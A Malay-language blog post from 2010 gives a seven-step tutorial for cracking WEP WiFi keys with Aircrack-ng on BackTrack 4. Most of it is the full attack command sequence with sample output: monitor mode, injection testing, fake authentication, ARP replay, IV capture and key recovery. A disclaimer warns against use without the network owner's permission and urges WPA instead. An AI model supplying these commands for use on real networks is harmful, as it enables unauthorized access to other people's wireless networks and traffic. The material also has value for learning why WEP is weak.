Friday, September 24, 2010

Cara-cara Menggodam WiFi

INFO DARI: http://www.huzaifah.org
JANGAN MENGGODAM TANPA KEBENARAN EMPUNYA RANGKAIAN. KERANA IANYA MENYALAHI UNDANG-UNDANG SIBER! HIJRAH HUZAIFAH TIDAK AKAN BERTANGGUNGJAWAB ATAS APA-APA AKIBAT DARI PENGGUNAAN TUTORIAL INI. TUTORIAL INI ADALAH SEKADAR UNTUK PERKONGSIAN ILMU SEMATA-MATA DAN ALAT YANG DIGUNAKAN BERTUJUAN TIDAK LAIN HANYALAH DEMI MENGUJI KEBERKESANAN SISTEM PERTAHANAN WIFI SESUATU RANGKAIAN.

Penggunaan Aircrack-NG adalah sangat mudah lebih lagi sekiranya kamu tahu menggunakan Linux dan sebarang sistem operasi berasaskan UNIX. Aku akan kongsikan cara-cara untuk menggodam ke WiFi yang menggunakan WEP kerana ianya lebih mudah dan pantas walaupun kini orang sudah jarang menggunakannya memandangkan WPA/WPA2 encryption adalah lebih kuat pertahanannya dan sangat susah untuk digodam. Mudahnya, jika kamu mempunyai sebarang rangkaian WiFi, sila guna WPA sebagai security encryption kerana kamu akan sedar betapa rapuhnya WEP itu selepas membaca tutorial ini. Dengan tujuh langkah mudah, WEP berjaya digodam.

Langkah 1 - Dapatkan Aircrack-NG
Dapatkan BackTrack 4 dan gunakan UNetbootin untuk membuat LiveUSB. Gunakan pendrive USB bersaiz 4GB dan boot melalui pendrive USB tersebut. Boleh juga BackTrack 4 tersebut diburn ke dalam DVD dan sama juga, sila boot menggunakan DVD tersebut.

Langkah 2 - Hidupkan WiFi dalam Monitor Mode
Run Konsole, dan pastikan kad WiFi anda berfungsi dengan menggunakan arahan ini.

iwconfig

Pastikan terdapat WiFi adapter anda di situ. Selalunya akan bernama wlan0.

Kemudian, gunakan arahan ifconfig wlan0 up untuk membangunkan WiFi anda dan pastikan ianya telah bangun dari tidur dengan menggunakan arahan ifconfig.

Guna arahan ini untuk meletakkan wlan0 kepada monitor mode.

airmon-ng start wlan0

Sistem akan membalas seperti berikut :

Interface       Chipset         Driver    wlan0           Atheros         madwifi-ng  mon0            Atheros         madwifi-ng VAP (parent: wlan0) (monitor mode enabled)

Langkah 3 - Uji Packet Injection
Ini adalah untuk memastikan anda berada dalam jarak yang cukup hampir dengan Access Point (AP) yang hendak digodam dan kebolehan kad WiFi anda untuk membuat Packet Injection.

aireplay-ng -9 -e huzaifahNet mon0

Di mana
  • -9 bermaksud injection test
  • -e huzaifahNet ialah nama jaringan wireless (SSID) tersebut.
  • mon0 ialah interface WiFi kad kita yang telah ditukar kepada monitor mode.
Anda akan mendapat respon berikut :

09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9  09:23:35  Trying broadcast probe requests...  09:23:35  Injection is working!  09:23:37  Found 1 AP     09:23:37  Trying directed probe requests...  09:23:37  00:14:6C:7E:40:80 - channel: 9 - 'huzaifahNet'  09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73  09:23:39  30/30: 100%

Pastikan output terakhir cukup tinggi dan sekiranya 0%, anda mungkin terlalu jauh dari AP tersebut ataupun kad WiFI anda tidak boleh digunakan untuk packet injection. Rujuk laman web Aircrack-NG untuk maklumat lanjut

Langkah 4 - Guna Airodump-NG untuk dapatkan IVs
Buka Konsole yang lain dan taip arahan di bawah.

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output mon0
Di mana :
  • -c 9 ialah channel AP tersebut.
  • --bssid 00:14:6C:7E:40:80 ialah alamat MAC untuk AP tersebut.
  • -w capture ialah nama file untuk IVs yang dipancing.
  • mon0 ialah nama interface seperti sedia maklum.
Ouput packet injection adalah seperti berikut:

CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25                                                                                                                  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID                                                                                                               00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         huzaifahNet                                                                                                                                          BSSID              STATION            PWR  Lost  Packets  Probes                                                                                                                                                            00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  


Langkah 5 - Buat Authentication Palsu Menggunakan aireplay-ng

aireplay-ng -1 0 -e huzaifahNet -h 00:0F:B5:88:AC:82 mon0
Di mana:
  • -1 bermaksud authentication palsu
  • 0 masa reassociation dalam saat
  • -e huzaifahNet nama wireless.
  • -h 00:0F:B5:88:AC:82 ialah MAC address kita
  • mon0 interface kad
Sekiranya berjaya,

18:18:20  Sending Authentication Request 18:18:20  Authentication successful 18:18:20  Sending Association Request 18:18:20  Association successful :-)

Langkah 6 - Guna aireplay-ng dalam ARP request mode

aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
Sekiranya berjaya (pastikan terdapat user lain berhubung dengan AP tersbut),

Saving ARP requests in replay_arp-0321-191525.cap  You should also start airodump-ng to capture replies.  Read 629399 packets (got 316283 ARP requests), sent 210955 packets...

Langkah 7 - Guna aircrack-ng untuk dapatkan WEP key

aircrack-ng -e huzaifahNet output*.cap
Sekiranya berjaya,

Aircrack-ng 0.9                                   [00:03:06] Tested 674449 keys (got 96610 IVs)    KB    depth   byte(vote)   0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0)    1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)    2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)    3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15)                           KEY FOUND! [ 12:34:56:78:90 ]        Probability: 100%

Perhatian :
Tutorial ini mengambil pendekatan paling mudah dan sekiranya terdapat sebarang kemusykilan, sila rujuk laman web aircrack-ng.

Wallahu'alam.
*jika anda mencuba, itu adalah tanggungjawab anda sendiri..*

No comments:

Post a Comment